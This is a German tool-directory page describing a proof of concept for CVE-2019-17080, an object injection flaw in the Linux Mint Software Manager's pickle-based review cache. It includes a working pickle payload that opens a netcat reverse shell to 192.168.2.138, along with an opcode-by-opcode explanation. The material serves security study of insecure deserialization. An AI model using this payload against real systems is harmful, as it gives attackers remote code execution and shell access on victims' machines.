Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Mintinstall-object-injection — CVE-2019-17080 | Kitploit
Tools/GitHubGitHub/materaj2/mintinstall-object-injection
Vulnerability AnalysisExploitationWeb Application ExploitationCTFLearning & EducationBinary Exploitation
GitHubmateraj2/mintinstall-object-injection

Mintinstall-object-injection

CVE-2019-17080

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 6 JahrenNoch nicht geprüft

Der Linux Mint Software Manager (v 7.9.5/9) führt aufgrund einer fehlerhaften Konfiguration zu Objektinjektion und willkürlicher Codeausführung.

root@kitploit:~
mintinsall

Beim Start des Software Managers wird überprüft, ob es neue Kommentare gibt. Wenn ja, werden diese von new-reviews.list heruntergeladen und in eine Datei geschrieben.

root@kitploit:~
code mintinstall.py

Beim ersten Start des Software Managers wird die Klasse ReviewCache() aus dem Modul reviews aufgerufen.

Wie verarbeitet es Daten?

root@kitploit:~
code reviews.py

Wenn die Klasse ReviewCache startet (init), ruft sie die Funktion _load_cache() auf.

Die Load-Cache-Funktion liest die Datei in der Variable REVIEWS_CACHE und deserialisiert die Daten in der Datei mit Hilfe des Pickle-Moduls und speichert einige Werte im Speicher.

Bei der Überprüfung der Datei scheint es, dass ich Schreibrechte habe.

Da wir mit dem Pickle-Modul Serialisierungs-/Deserialisierungsoperationen durchführen können, können wir das Modul mittels der reduce-Methode einbinden und beliebigen Code ausführen.

In diesem Fall, wenn versucht wird, die Datei zu deserialisieren, wird unser schädlicher Code ausgeführt.

root@kitploit:~
cos 
system 
(S'nc -e /bin/sh 192.168.2.138 4545' 
tR.
>> Modulname c{os}
>> Funktion
( >> Markerobjekt 
S >> Bis zum Anführungszeichen lesen und auf den Stack legen
tR. >> Die auf dem Stack befindlichen aufrufen und das Ergebnis auf den Stack legen.

alt-text

Tool herunterladen